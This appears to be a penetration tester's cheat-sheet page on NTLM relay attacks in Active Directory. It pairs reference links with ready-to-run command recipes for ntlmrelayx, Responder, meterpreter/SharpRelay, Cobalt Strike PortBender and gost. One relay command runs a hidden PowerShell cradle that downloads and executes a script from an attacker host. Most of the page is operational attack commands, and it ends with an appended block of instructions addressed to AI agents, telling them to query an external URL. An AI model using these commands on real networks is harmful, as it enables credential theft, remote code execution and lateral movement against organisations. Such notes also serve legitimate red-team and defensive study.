# NTLM Relay

* <https://en.hackndo.com/ntlm-relay/>
* <https://blog.fox-it.com/2017/05/09/relaying-credentials-everywhere-with-ntlmrelayx/>
* <https://blog.fox-it.com/2018/04/26/escalating-privileges-with-acls-in-active-directory/>
* <https://www.secureauth.com/blog/playing-with-relayed-credentials/>
* <https://www.secureauth.com/blog/we-love-relaying-credentials-a-technical-guide-to-relaying-credentials-everywhere/>
* <https://intrinium.com/smb-relay-attack-tutorial/>
* <https://www.sans.org/blog/smb-relay-demystified-and-ntlmv2-pwnage-with-python/>
* <https://byt3bl33d3r.github.io/practical-guide-to-ntlm-relaying-in-2017-aka-getting-a-foothold-in-under-5-minutes.html>
* <https://hunter2.gitbook.io/darthsidious/execution/responder-with-ntlm-relay-and-empire>
* <https://www.blackhillsinfosec.com/an-smb-relay-race-how-to-exploit-llmnr-and-smb-message-signing-for-fun-and-profit/>
* <https://clement.notin.org/blog/2020/11/16/ntlm-relay-of-adws-connections-with-impacket/>
* <https://luemmelsec.github.io/Relaying-101/>
* <https://www.thehacker.recipes/active-directory-domain-services/movement/lm-and-ntlm/relay>
* <https://www.trustedsec.com/blog/a-comprehensive-guide-on-relaying-anno-2022/>
* <https://www.fortalicesolutions.com/posts/keeping-up-with-the-ntlm-relay>
* <https://offsec.almond.consulting/ldap-relays-for-initial-foothold-in-dire-situations.html>
* <https://labs.nettitude.com/blog/network-relaying-abuse-windows-domain/>
* <https://xakep.ru/2023/04/07/ntlm-relay-guide/>
* <https://xakep.ru/2023/04/11/ntlm-relay-guide-2/>
* [\[PDF\] Coercions and Relays – The First Cred is the Deepest (Gabriel Prudhomme)](https://www.blackhillsinfosec.com/wp-content/uploads/2022/09/Coercions-and-Relays-The-First-Cred-is-the-Deepest.pdf)

{% embed url="<https://youtu.be/b0lLxLJKaRs>" %}

{% file src="/files/AJWHEZuwzA1ARbnYpDym" %}

Generate relay list with CME and enumerate local admins when relaying:

```
$ cme smb 192.168.2.0/24 --gen-relay-list relay.txt
$ ntlmrelayx.py -tf relay.txt -smb2support --enum-local-admins -of net-ntlmv2 --no-http-server --no-wcf-server --no-raw-server
```

Relay & catch hashes (via [multi-relay](https://www.thehacker.recipes/ad/movement/ntlm/relay#tips-and-tricks)):

```
$ smbserver.py -smb2support -port 8445 share `pwd`
$ ntlmrelayx.py -tf targets.txt -smb2support --no-http-server --no-wcf-server --no-raw-server
$ cat targets.txt
smb://10.10.13.37
smb://127.0.0.1:8445
```

{% hint style="info" %}
The easier way though is to use the combination of `-of/--output-file hashes.txt -ntlmchallenge 1122334455667788` options to save the hash with a predefined challenge to a file while relaying.
{% endhint %}

Relay NTLM2 responses obtained from Responder's proxy authentication to LDAP(S) (Responder's HTTP must be `Off`):

{% embed url="<https://twitter.com/theluemmel/status/1455099572305416197>" %}

```
$ ntlmrelayx.py -t ldap(s)://DC01.megacorp.local --http-port 3128 [--add-computer] / [--delegate-access [--escalate-user 'PWNED-MACHINE$']] [-socks] --no-smb-server --no-wcf-server --no-raw-server --no-dump [--no-da --no-acl --no-validate-privs]
$ sudo ./Responder.py -I eth0 -wd -P -v
```

## Relaying on Windows

### meterpreter + SharpRelay

* <https://diablohorn.com/2018/08/25/remote-ntlm-relaying-through-meterpreter-on-windows-port-445/>
* <https://github.com/pkb1s/SharpRelay>

Divert incoming SMB traffic from Victim to Attacker's local 445 port through an elevated meterpreter session and relay it to Target via MSF SOCKS server.

1\. Add a static route to the Target through the 1st meterpreter session:

```
meterpreter > route add 192.168.1.11/32 1
```

2\. Start MSF SOCKS server:

```
msf > use auxiliary/server/socks_proxy
msf auxiliary(server/socks_proxy) > set SRVHOST 127.0.0.1
msf auxiliary(server/socks_proxy) > run -j
```

3\. Forward a reverse port 8445 on Victim to local port 445 on Attacker and start diverting incoming SMB traffic on Victim to Victim's local 8445 port:

```
meterpreter > portfwd add -R -L 127.0.0.1 -l 445 -p 8445
meterpreter > cd C:\\Windows\\System32\\drivers
meterpreter > upload /home/snovvcrash/www/WinDivert64.sys
msf post(windows/manage/execute_dotnet_assembly) > set SESSION 1
msf post(windows/manage/execute_dotnet_assembly) > set DOTNET_EXE /home/snovvcrash/www/SharpRelay.exe
msf post(windows/manage/execute_dotnet_assembly) > set ARGUMENTS relaysvc "C:\Windows\System32\drivers\WinDivert64.sys" 445 8445
msf post(windows/manage/execute_dotnet_assembly) > run
```

4\. Relay the diverted traffic to Target through SOCKS:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support
```

{% hint style="warning" %}
When ran once, the driver must be unloaded or the host rebooted before trying again. The fake service can be deleted with a PowerShell command:

```
PS > (sc.exe stop relaysvc) -and (sc.exe delete relaysvc)
```

{% endhint %}

### beacon + PortBender

* <https://github.com/praetorian-inc/PortBender>
* <https://rastamouse.me/ntlm-relaying-via-cobalt-strike/>

Set SOCKS server & port forwarding, upload WinDivert driver and configure redirection with PortBender:

```
beacon> socks 1080
beacon> rportfwd 8445 127.0.0.1 445
beacon> cd C:\Windows\System32\drivers
beacon> upload /home/snovvcrash/www/WinDivert64.sys
beacon> PortBender redirect 445 8445
```

Relay the planet:

```
$ sudo proxychains4 -q ntlmrelayx.py -t smb://192.168.1.11 -smb2support --no-http-server --no-wcf-server -c 'powershell -nop -w hidden -c "iex(new-object net.webclient).downloadstring(\"http://10.10.13.37:8080/pwn.ps1\")"'
```

Stop PortBender:

```
beacon> jobs
beacon> jobkill <JID>
beacon> kill <PID>
```

### gost (GO Simple Tunnel)

* <https://github.com/ginuerzh/gost>

```
Cmd > gost.exe -L auto://0.0.0.0:31337
$ gost -L rtcp://0.0.0.0:445/10.10.13.37:445 -F socks5://127.0.0.1:10080 [-F socks5://127.0.0.1:20080 ...] -F socks5://192.168.1.11:31337
```

## CVE-2019-1040

* <https://github.com/fox-it/cve-2019-1040-scanner/blob/master/scan.py>

```
$ python scan.py MEGACORP/snovvcrash:'Passw0rd!'@192.168.1.11
$ python scan.py -target-file DCs.txt MEGACORP/snovvcrash:'Passw0rd!'@placeholder.xyz
```

## CVE-2025-33073

* [\[PDF\] Reflective Kerberos Relay Attack (RedTeam Pentesting)](https://www.redteam-pentesting.de/publications/2025-06-11-Reflective-Kerberos-Relay-Attack_RedTeam-Pentesting.pdf)
* <https://blog.redteam-pentesting.de/2025/reflective-kerberos-relay-attack/>
* <https://aegisbyte.com/resources/reflective-kerberos-relay-attack>
* <https://www.synacktiv.com/en/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025>

### CVE-2025–54918

* <https://decoder.cloud/2025/11/24/reflecting-your-authentication-when-windows-ends-up-talking-to-itself/>
* <https://yousofnahya.medium.com/hands-on-exploitation-of-cve-2025-54918-cf376ebb40e1>
* <https://github.com/Wh0am123/CVE-2025-54918-POC>


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://ppn.snovvcra.sh/pentest/infrastructure/ad/ntlm/ntlm-relay.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.